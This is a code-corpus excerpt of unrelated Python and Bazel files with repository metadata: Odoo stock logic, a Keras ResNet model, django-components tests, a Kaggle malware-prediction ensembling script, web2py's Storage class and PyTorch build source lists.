self.qty_done, ml.product_uom_qty - ml.qty_done)
self.qty_done -= quantity_to_process
new_quantity_done = (ml.qty_done + quantity_to_process)
if float_compare(new_quantity_done, ml.product_uom_qty, precision_rounding=rounding) >= 0:
ml.write({
'qty_done': new_quantity_done,
'lot_produced_ids': self._get_produced_lots(),
})
else:
new_qty_reserved = ml.product_uom_qty - new_quantity_done
default = {
'product_uom_qty': new_quantity_done,
'qty_done': new_quantity_done,
'lot_produced_ids': self._get_produced_lots(),
}
ml.copy(default=default)
ml.with_context(bypass_reservation_update=True).write({
'product_uom_qty': new_qty_reserved,
'qty_done': 0
})
| 47.033333
| 160
| 0.626034
|
4a18fe8dcc40336b560ccd20ce45bc39ad9f3dd6
| 2,190
|
py
|
Python
|
final_project/neural_net/net_model_resnet.py
|
jrkwon/ce491-2019
|
25e66157b03f123abcfdda294f36d47a0bc12273
|
[
"CC0-1.0"
] | null | null | null |
final_project/neural_net/net_model_resnet.py
|
jrkwon/ce491-2019
|
25e66157b03f123abcfdda294f36d47a0bc12273
|
[
"CC0-1.0"
] | null | null | null |
final_project/neural_net/net_model_resnet.py
|
jrkwon/ce491-2019
|
25e66157b03f123abcfdda294f36d47a0bc12273
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 28 2019 4:57 pm
@author: doshininad
"""
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.models import Model
from keras.layers import Dense
from keras import losses, optimizers
from config import Config
class NetModel:
def __init__(self, model_path):
self.model = None
self.x = None
self.prediction = None
model_name = model_path[model_path.rfind('/'):] # get folder name
self.name = model_name.strip('/')
self.model_path = model_path
#self.config = Config()
self._model()
self.base_model = None
def _model(self):
input_shape = (Config.config['input_image_width'],
Config.config['input_image_height'],
Config.config['input_image_depth'])
self.base_model = ResNet50(weights='imagenet', include_top=False, input_shape=input_shape)
self.x = self.base_model.output
self.x = Dense(512, activation='relu')(self.x)
self.x = Dense(256, activation='relu')(self.x)
self.x = Dense(64, activation='relu')(self.x)
self.prediction = Dense(Config.config['num_outputs'], activation='relu')(self.x)
self.model = Model(inputs=self.base_model.input, outputs=self.prediction)
for layer in self.base_model.layers[:44]:
layer.trainable = False
for layer in self.base_model.layers[44:]:
layer.trainable = True
self._compile()
def _compile(self):
self.model.compile(loss=losses.mean_squared_error, optimizer=optimizers.Adam())
def save(self):
json_string = self.model.to_json()
weight_filename = self.model_path + '_' + const.CONFIG_YAML
open(weight_filename+'.json', 'w').write(json_string)
self.model.save_weights(weight_filename+'.h5', overwrite=True)
def load(self):
from keras.models import model_from_json
self.model = model_from_json(open(self.model_path+'.json').read())
self.model.load_weights(self.model_path+'.h5')
self._compile()
| 33.692308
| 98
| 0.643836
|
4a18feb6e018958c4d785115e75d178c2c1b9ef1
| 14,968
|
py
|
Python
|
tests/test_context.py
|
danjac/django-components
|
bb3193cd4c66feb6636a4357c40e677b162d4f02
|
[
"MIT"
] | null | null | null |
tests/test_context.py
|
danjac/django-components
|
bb3193cd4c66feb6636a4357c40e677b162d4f02
|
[
"MIT"
] | null | null | null |
tests/test_context.py
|
danjac/django-components
|
bb3193cd4c66feb6636a4357c40e677b162d4f02
|
[
"MIT"
] | null | null | null |
from django.template import Context, Template
from django_components import component
from .django_test_setup import * # NOQA
from .testutils import Django111CompatibleSimpleTestCase as SimpleTestCase
class SimpleComponent(component.Component):
def context(self, variable=None):
return {"variable": variable} if variable is not None else {}
def template(self, context):
return "simple_template.html"
@staticmethod
def expected_output(variable_value):
return 'Variable: < strong > {} < / strong >'.format(variable_value)
class ParentComponent(component.Component):
def context(self):
return {
"shadowing_variable": 'NOT SHADOWED'
}
def template(self, context):
return "parent_template.html"
class ParentComponentWithArgs(component.Component):
def context(self, parent_value):
return {
"inner_parent_value": parent_value
}
def template(self, context):
return "parent_with_args_template.html"
class VariableDisplay(component.Component):
def context(self, shadowing_variable=None, new_variable=None):
context = {}
if shadowing_variable is not None:
context['shadowing_variable'] = shadowing_variable
if new_variable is not None:
context['unique_variable'] = new_variable
return context
def template(self, context):
return "variable_display.html"
class IncrementerComponent(component.Component):
def context(self, value=0):
value = int(value)
if hasattr(self, 'call_count'):
self.call_count += 1
else:
self.call_count = 1
return {
"value": value + 1,
"calls": self.call_count
}
def template(self, context):
return "incrementer.html"
class OuterContextComponent(component.Component):
def context(self):
return self.outer_context
def template(self, context):
return "simple_template.html"
component.registry.register(name='parent_component', component=ParentComponent)
component.registry.register(name='parent_with_args', component=ParentComponentWithArgs)
component.registry.register(name='variable_display', component=VariableDisplay)
component.registry.register(name='incrementer', component=IncrementerComponent)
component.registry.register(name='simple_component', component=SimpleComponent)
component.registry.register(name='outer_context_component', component=OuterContextComponent)
class ContextTests(SimpleTestCase):
def test_nested_component_context_shadows_parent_with_unfilled_slots_and_component_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'parent_component' %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_instances_have_unique_context_with_unfilled_slots_and_component_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='parent_component' %}")
rendered = template.render(Context())
self.assertIn('<h1>Uniquely named variable = unique_val</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = slot_default_unique</h1>', rendered, rendered)
def test_nested_component_context_shadows_parent_with_unfilled_slots_and_component_block_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_instances_have_unique_context_with_unfilled_slots_and_component_block_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Uniquely named variable = unique_val</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = slot_default_unique</h1>', rendered, rendered)
def test_nested_component_context_shadows_parent_with_filled_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='shadow_from_slot' new_variable='unique_from_slot' %}{% endslot %}"
"{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = shadow_from_slot</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_instances_have_unique_context_with_filled_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='shadow_from_slot' new_variable='unique_from_slot' %}{% endslot %}"
"{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Uniquely named variable = unique_val</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = unique_from_slot</h1>', rendered, rendered)
def test_nested_component_context_shadows_outer_context_with_unfilled_slots_and_component_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='parent_component' %}")
rendered = template.render(Context({'shadowing_variable': 'NOT SHADOWED'}))
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_context_shadows_outer_context_with_unfilled_slots_and_component_block_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}{% endcomponent_block %}")
rendered = template.render(Context({'shadowing_variable': 'NOT SHADOWED'}))
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_context_shadows_outer_context_with_filled_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='shadow_from_slot' new_variable='unique_from_slot' %}{% endslot %}"
"{% endcomponent_block %}")
rendered = template.render(Context({'shadowing_variable': 'NOT SHADOWED'}))
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = shadow_from_slot</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
class ParentArgsTests(SimpleTestCase):
def test_parent_args_can_be_drawn_from_context(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_with_args' parent_value=parent_value %}"
"{% endcomponent_block %}")
rendered = template.render(Context({'parent_value': 'passed_in'}))
self.assertIn('<h1>Shadowing variable = passed_in</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = passed_in</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_parent_args_available_outside_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_with_args' parent_value='passed_in' %}{%endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = passed_in</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = passed_in</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_parent_args_available_in_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_with_args' parent_value='passed_in' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='value_from_slot' new_variable=inner_parent_value %}{% endslot %}"
"{%endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = value_from_slot</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = passed_in</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
class ContextCalledOnceTests(SimpleTestCase):
def test_one_context_call_with_simple_component(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='incrementer' %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=1;calls=1</p>', rendered)
def test_one_context_call_with_simple_component_and_arg(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='incrementer' value='2' %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=3;calls=1</p>', rendered)
def test_one_context_call_with_component_block(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=1;calls=1</p>', rendered)
def test_one_context_call_with_component_block_and_arg(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' value='3' %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=4;calls=1</p>', rendered)
def test_one_context_call_with_slot(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' %}{% slot 'content' %}"
"<p>slot</p>{% endslot %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=1;calls=1</p>\n<p>slot</p>', rendered)
def test_one_context_call_with_slot_and_arg(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' value='3' %}{% slot 'content' %}"
"<p>slot</p>{% endslot %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=4;calls=1</p>\n<p>slot</p>', rendered)
class ComponentsCanAccessOuterContext(SimpleTestCase):
def test_simple_component_can_use_outer_context(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'simple_component' %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
class IsolatedContextTests(SimpleTestCase):
def test_simple_component_can_pass_outer_context_in_args(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'simple_component' variable only %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
def test_simple_component_cannot_use_outer_context(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'simple_component' only %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertNotIn('outer_value', rendered, rendered)
class OuterContextPropertyTests(SimpleTestCase):
def test_outer_context_property_with_component(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'outer_context_component' only %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
def test_outer_context_property_with_component_block(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'outer_context_component' only %}{% endcomponent_block %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
| 51.972222
| 119
| 0.661745
|
4a18ffa1106fb1bf2476d83c2d9fd8b253cb2255
| 1,332
|
py
|
Python
|
py/trash/921_mean_0218-1.py
|
KazukiOnodera/Microsoft-Malware-Prediction
|
103cbf7c4fc98ae584e1aa9d1c220bb79ddbbd80
|
[
"MIT"
] | 24
|
2019-03-14T05:03:16.000Z
|
2021-07-16T05:14:05.000Z
|
py/trash/921_mean_0218-1.py
|
xwc940512/Microsoft-Malware-Prediction
|
103cbf7c4fc98ae584e1aa9d1c220bb79ddbbd80
|
[
"MIT"
] | 1
|
2019-05-20T10:06:33.000Z
|
2019-05-20T10:06:33.000Z
|
py/trash/921_mean_0218-1.py
|
xwc940512/Microsoft-Malware-Prediction
|
103cbf7c4fc98ae584e1aa9d1c220bb79ddbbd80
|
[
"MIT"
] | 8
|
2019-03-14T06:28:38.000Z
|
2019-05-21T14:58:21.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 15 18:10:36 2019
@author: kazuki.onodera
"""
import numpy as np
import pandas as pd
from glob import glob
import utils
SUBMIT_FILE_PATH = '../output/0218-1.csv.gz'
COMMENT = 'nejumi + f002'
EXE_SUBMIT = True
# =============================================================================
#
# =============================================================================
files = sorted(glob('../output/0218-1*.pkl.gz'))
sub = pd.read_csv('../input/sample_submission.csv.zip')
for file in files:
sub['HasDetections'] += pd.read_pickle(file)['HasDetections']
sub['HasDetections'] /= sub['HasDetections'].max()
print('corr with best')
sub_best = pd.read_csv(utils.SUB_BEST)
print('with mybest:', sub['HasDetections'].corr( sub_best['HasDetections'], method='spearman') )
sub_best['HasDetections'] = np.load(utils.SUB_nejumi)
print('with nejumi:', sub['HasDetections'].corr( sub_best['HasDetections'], method='spearman') )
# save
sub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')
# =============================================================================
# submission
# =============================================================================
if EXE_SUBMIT:
print('submit')
utils.submit(SUBMIT_FILE_PATH, COMMENT)
| 25.132075
| 96
| 0.535285
|
4a1900a123262453571877fe8a9ed5fb36bfd53a
| 458
|
py
|
Python
|
book/src/ch10/service/libs/web/setup.py
|
zangyuchen2008/Clean-Code-in-Python-Second-Edition
|
0be2e41f6cf7322e12ec55d76135ff398df61b4a
|
[
"MIT"
] | 133
|
2016-07-22T15:16:16.000Z
|
2022-03-29T22:39:40.000Z
|
book/src/ch10/service/libs/web/setup.py
|
zangyuchen2008/Clean-Code-in-Python-Second-Edition
|
0be2e41f6cf7322e12ec55d76135ff398df61b4a
|
[
"MIT"
] | 137
|
2021-01-05T11:21:04.000Z
|
2022-03-31T11:10:11.000Z
|
book/src/ch10/service/libs/web/setup.py
|
zangyuchen2008/Clean-Code-in-Python-Second-Edition
|
0be2e41f6cf7322e12ec55d76135ff398df61b4a
|
[
"MIT"
] | 41
|
2020-12-29T04:46:14.000Z
|
2022-03-20T22:36:17.000Z
|
from setuptools import find_packages, setup
with open("README.rst", "r") as longdesc:
long_description = longdesc.read()
install_requires = ["sanic>=20,<21"]
setup(
name="web",
description="Library with helpers for the web-related functionality",
long_description=long_description,
author="Dev team",
version="0.1.0",
packages=find_packages(where="src/"),
package_dir={"": "src"},
install_requires=install_requires,
)
| 24.105263
| 73
| 0.696507
|
4a1900d53f28c261a6f05504ebe12b3b681588ed
| 7,395
|
py
|
Python
|
applications/app1/venv/lib/python2.7/site-packages/gluon/storage.py
|
link-money-dev/link-api-web-service
|
3da226c7115ee4267f8346620029b710b9987e74
|
[
"BSD-3-Clause"
] | null | null | null |
applications/app1/venv/lib/python2.7/site-packages/gluon/storage.py
|
link-money-dev/link-api-web-service
|
3da226c7115ee4267f8346620029b710b9987e74
|
[
"BSD-3-Clause"
] | 1
|
2021-06-01T22:32:25.000Z
|
2021-06-01T22:32:25.000Z
|
applications/app1/venv/lib/python2.7/site-packages/gluon/storage.py
|
link-money-dev/link-api-web-service
|
3da226c7115ee4267f8346620029b710b9987e74
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Provides:
- List; like list but returns None instead of IndexOutOfBounds
- Storage; like dictionary allowing also for `obj.foo` for `obj['foo']`
"""
import cPickle
import portalocker
__all__ = ['List', 'Storage', 'Settings', 'Messages',
'StorageList', 'load_storage', 'save_storage']
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`, and setting obj.foo = None deletes item foo.
>>> o = Storage(a=1)
>>> print o.a
1
>>> o['a']
1
>>> o.a = 2
>>> print o['a']
2
>>> del o.a
>>> print o.a
None
"""
__slots__=()
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
__getitem__ = dict.get
__getattr__ = dict.get
__repr__ = lambda self: '<Storage %s>' % dict.__repr__(self)
# http://stackoverflow.com/questions/5247250/why-does-pickle-getstate-accept-as-a-return-value-the-very-instance-it-requi
__getstate__ = lambda self: None
__copy__ = lambda self: Storage(self)
def getlist(self,key):
"""
Return a Storage value as a list.
If the value is a list it will be returned as-is.
If object is None, an empty list will be returned.
Otherwise, [value] will be returned.
Example output for a query string of ?x=abc&y=abc&y=def
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlist('x')
['abc']
>>> request.vars.getlist('y')
['abc', 'def']
>>> request.vars.getlist('z')
[]
"""
value = self.get(key,[])
return value if not value else \
value if isinstance(value,(list,tuple)) else [value]
def getfirst(self,key,default=None):
"""
Return the first or only value when given a request.vars-style key.
If the value is a list, its first item will be returned;
otherwise, the value will be returned as-is.
Example output for a query string of ?x=abc&y=abc&y=def
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getfirst('x')
'abc'
>>> request.vars.getfirst('y')
'abc'
>>> request.vars.getfirst('z')
"""
values = self.getlist(key)
return values[0] if values else default
def getlast(self,key,default=None):
"""
Returns the last or only single value when
given a request.vars-style key.
If the value is a list, the last item will be returned;
otherwise, the value will be returned as-is.
Simulated output with a query string of ?x=abc&y=abc&y=def
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlast('x')
'abc'
>>> request.vars.getlast('y')
'def'
>>> request.vars.getlast('z')
"""
values = self.getlist(key)
return values[-1] if values else default
PICKABLE = (str,int,long,float,bool,list,dict,tuple,set)
class StorageList(Storage):
"""
like Storage but missing elements default to [] instead of None
"""
def __getitem__(self,key):
return self.__getattr__(key)
def __getattr__(self, key):
if key in self:
return getattr(self,key)
else:
r = []
setattr(self,key,r)
return r
def load_storage(filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'rb')
storage = cPickle.load(fp)
finally:
if fp: fp.close()
return Storage(storage)
def save_storage(storage, filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'wb')
cPickle.dump(dict(storage), fp)
finally:
if fp: fp.close()
class Settings(Storage):
def __setattr__(self, key, value):
if key != 'lock_keys' and self['lock_keys'] and key not in self:
raise SyntaxError, 'setting key \'%s\' does not exist' % key
if key != 'lock_values' and self['lock_values']:
raise SyntaxError, 'setting value cannot be changed: %s' % key
self[key] = value
class Messages(Settings):
def __init__(self, T):
Storage.__init__(self,T=T)
def __getattr__(self, key):
value = self[key]
if isinstance(value, str):
return str(self.T(value))
return value
class FastStorage(dict):
"""
Eventually this should replace class Storage but causes memory leak
because of http://bugs.python.org/issue1469629
>>> s = FastStorage()
>>> s.a = 1
>>> s.a
1
>>> s['a']
1
>>> s.b
>>> s['b']
>>> s['b']=2
>>> s['b']
2
>>> s.b
2
>>> isinstance(s,dict)
True
>>> dict(s)
{'a': 1, 'b': 2}
>>> dict(FastStorage(s))
{'a': 1, 'b': 2}
>>> import pickle
>>> s = pickle.loads(pickle.dumps(s))
>>> dict(s)
{'a': 1, 'b': 2}
>>> del s.b
>>> del s.a
>>> s.a
>>> s.b
>>> s['a']
>>> s['b']
"""
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__ = self
def __getattr__(self,key):
return getattr(self,key) if key in self else None
def __getitem__(self,key):
return dict.get(self,key,None)
def copy(self):
self.__dict__ = {}
s = FastStorage(self)
self.__dict__ = self
return s
def __repr__(self):
return '<Storage %s>' % dict.__repr__(self)
def __getstate__(self):
return dict(self)
def __setstate__(self, sdict):
dict.__init__(self, sdict)
self.__dict__=self
def update(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__=self
class List(list):
"""
Like a regular python list but a[i] if i is out of bounds return None
instead of IndexOutOfBounds
"""
def __call__(self, i, default=None, cast=None, otherwise=None):
"""
request.args(0,default=0,cast=int,otherwise='http://error_url')
request.args(0,default=0,cast=int,otherwise=lambda:...)
"""
n = len(self)
if 0<=i<n or -n<=i<0:
value = self[i]
else:
value = default
if cast:
try:
value = cast(value)
except (ValueError, TypeError):
from http import HTTP, redirect
if otherwise is None:
raise HTTP(404)
elif isinstance(otherwise,str):
redirect(otherwise)
elif callable(otherwise):
return otherwise()
else:
raise RuntimeError, "invalid otherwise"
return value
if __name__ == '__main__':
import doctest
doctest.testmod()
| 27.490706
| 125
| 0.553212
|
4a1903ef21b5ca9c0058b5e328575015cc65a16b
| 54,447
|
bzl
|
Python
|
tools/build_variables.bzl
|
gmagogsfm/pytorch-1
|
88032d894311e5c0aed8bbc21a4306bc6be4af82
|
[
"Intel"
] | 1
|
2019-11-20T08:10:31.000Z
|
2019-11-20T08:10:31.000Z
|
tools/build_variables.bzl
|
goncaloperes/pytorch
|
4a128ed811324b7a8d6cdd9bba16d9aeaac9cf86
|
[
"Intel"
] | null | null | null |
tools/build_variables.bzl
|
goncaloperes/pytorch
|
4a128ed811324b7a8d6cdd9bba16d9aeaac9cf86
|
[
"Intel"
] | null | null | null |
# In both open-source and fbcode builds, these are generated into
# torch/csrc/{autgrad,jit}/generated.i
GENERATED_CPP = [
"autograd/generated/Functions.cpp",
"autograd/generated/VariableType_0.cpp",
"autograd/generated/VariableType_1.cpp",
"autograd/generated/VariableType_2.cpp",
"autograd/generated/VariableType_3.cpp",
"autograd/generated/VariableType_4.cpp",
"autograd/generated/TraceType_0.cpp",
"autograd/generated/TraceType_1.cpp",
"autograd/generated/TraceType_2.cpp",
"autograd/generated/TraceType_3.cpp",
"autograd/generated/TraceType_4.cpp",
"autograd/generated/ADInplaceOrViewType_0.cpp",
"autograd/generated/ADInplaceOrViewType_1.cpp",
"autograd/generated/python_functions_0.cpp",
"autograd/generated/python_functions_1.cpp",
"autograd/generated/python_functions_2.cpp",
"autograd/generated/python_functions_3.cpp",
"autograd/generated/python_functions_4.cpp",
"autograd/generated/python_nn_functions.cpp",
"autograd/generated/python_fft_functions.cpp",
"autograd/generated/python_linalg_functions.cpp",
"autograd/generated/python_special_functions.cpp",
"autograd/generated/python_torch_functions_0.cpp",
"autograd/generated/python_torch_functions_1.cpp",
"autograd/generated/python_torch_functions_2.cpp",
"autograd/generated/python_variable_methods.cpp",
]
# NVFuser runtime library
libtorch_nvfuser_runtime_sources = [
"torch/csrc/jit/codegen/cuda/runtime/block_reduction.cu",
"torch/csrc/jit/codegen/cuda/runtime/broadcast.cu",
"torch/csrc/jit/codegen/cuda/runtime/fp16_support.cu",
"torch/csrc/jit/codegen/cuda/runtime/grid_reduction.cu",
"torch/csrc/jit/codegen/cuda/runtime/helpers.cu",
"torch/csrc/jit/codegen/cuda/runtime/random_numbers.cu",
"torch/csrc/jit/codegen/cuda/runtime/tensor.cu",
"aten/src/ATen/cuda/detail/PhiloxCudaStateRaw.cuh",
"aten/src/ATen/cuda/detail/UnpackRaw.cuh",
]
libtorch_nvfuser_generated_headers = ["{}.h".format(name.split("/")[-1].split(".")[0]) for name in libtorch_nvfuser_runtime_sources]
def libtorch_generated_sources(gencode_pattern):
return [gencode_pattern.format(name) for name in [
"autograd/generated/Functions.cpp",
"autograd/generated/VariableType_0.cpp",
"autograd/generated/VariableType_1.cpp",
"autograd/generated/VariableType_2.cpp",
"autograd/generated/VariableType_3.cpp",
"autograd/generated/VariableType_4.cpp",
"autograd/generated/TraceType_0.cpp",
"autograd/generated/TraceType_1.cpp",
"autograd/generated/TraceType_2.cpp",
"autograd/generated/TraceType_3.cpp",
"autograd/generated/TraceType_4.cpp",
"autograd/generated/ADInplaceOrViewType_0.cpp",
"autograd/generated/ADInplaceOrViewType_1.cpp",
]]
# copied from https://github.com/pytorch/pytorch/blob/f99a693cd9ff7a9b5fdc71357dac66b8192786d3/aten/src/ATen/core/CMakeLists.txt
jit_core_headers = [
"torch/csrc/utils/memory.h",
"torch/csrc/WindowsTorchApiMacro.h",
"torch/csrc/jit/frontend/source_range.h",
"torch/csrc/jit/serialization/callstack_debug_info_serialization.h",
"torch/csrc/jit/serialization/source_range_serialization.h",
"torch/csrc/jit/frontend/lexer.h",
"torch/csrc/jit/frontend/strtod.h",
"torch/csrc/jit/frontend/parser_constants.h",
"torch/csrc/jit/frontend/function_schema_parser.h",
"torch/csrc/jit/frontend/parse_string_literal.h",
"torch/csrc/jit/frontend/schema_type_parser.h",
"torch/csrc/jit/frontend/error_report.h",
"torch/csrc/jit/frontend/tree.h",
"torch/custom_class.h",
"torch/custom_class_detail.h",
"torch/library.h",
]
jit_core_sources = [
"torch/csrc/jit/frontend/error_report.cpp",
"torch/csrc/jit/frontend/function_schema_parser.cpp",
"torch/csrc/jit/frontend/lexer.cpp",
"torch/csrc/jit/frontend/schema_type_parser.cpp",
"torch/csrc/jit/frontend/strtod.cpp",
"torch/csrc/jit/frontend/source_range.cpp",
]
# copied from https://github.com/pytorch/pytorch/blob/0bde610c14b92d351b968a0228df29e92442b1cc/torch/CMakeLists.txt
# There are some common files used in both internal lite-interpreter and full-jit. Making a separate
# list for the shared files.
core_sources_common = [
"torch/csrc/autograd/profiler_utils.cpp",
"torch/csrc/autograd/autograd_meta.cpp",
"torch/csrc/autograd/forward_grad.cpp",
"torch/csrc/jit/frontend/edit_distance.cpp",
"torch/csrc/jit/frontend/string_to_type.cpp",
"torch/csrc/jit/mobile/type_parser.cpp",
"torch/csrc/jit/mobile/runtime_compatibility.cpp",
"torch/csrc/jit/runtime/instruction.cpp",
"torch/csrc/jit/runtime/jit_exception.cpp",
"torch/csrc/jit/runtime/operator.cpp",
"torch/csrc/jit/runtime/print_handler.cpp",
"torch/csrc/jit/runtime/slice_indices_adjust.cpp",
"torch/csrc/jit/runtime/register_ops_utils.cpp",
"torch/csrc/jit/runtime/vararg_functions.cpp",
"torch/csrc/jit/mobile/promoted_prim_ops.cpp",
"torch/csrc/jit/mobile/prim_ops_registery.cpp",
"torch/csrc/jit/serialization/import_read.cpp",
"torch/csrc/jit/serialization/unpickler.cpp",
]
libtorch_sources_common = core_sources_common
# The profilers are not needed in the lite interpreter build.
libtorch_profiler_sources = [
"torch/csrc/autograd/profiler_legacy.cpp",
"torch/csrc/autograd/profiler_kineto.cpp",
]
libtorch_edge_profiler_sources = libtorch_profiler_sources + [
"torch/csrc/jit/mobile/profiler_edge.cpp",
]
core_trainer_sources = [
"torch/csrc/autograd/anomaly_mode.cpp",
"torch/csrc/autograd/autograd.cpp",
"torch/csrc/autograd/autograd_not_implemented_fallback.cpp",
"torch/csrc/autograd/cpp_hook.cpp",
"torch/csrc/autograd/custom_function.cpp",
"torch/csrc/autograd/engine.cpp",
"torch/csrc/autograd/function.cpp",
"torch/csrc/autograd/function_hook.cpp",
"torch/csrc/autograd/functions/accumulate_grad.cpp",
"torch/csrc/autograd/functions/basic_ops.cpp",
"torch/csrc/autograd/functions/tensor.cpp",
"torch/csrc/autograd/functions/utils.cpp",
"torch/csrc/autograd/input_buffer.cpp",
"torch/csrc/autograd/record_function_ops.cpp",
"torch/csrc/autograd/saved_variable.cpp",
"torch/csrc/autograd/variable.cpp",
"torch/csrc/jit/frontend/name_mangler.cpp",
"torch/csrc/jit/ir/type_hashing.cpp",
"torch/csrc/jit/serialization/pickler.cpp",
"torch/csrc/jit/serialization/type_name_uniquer.cpp",
]
core_sources_full_mobile_no_backend_interface = [
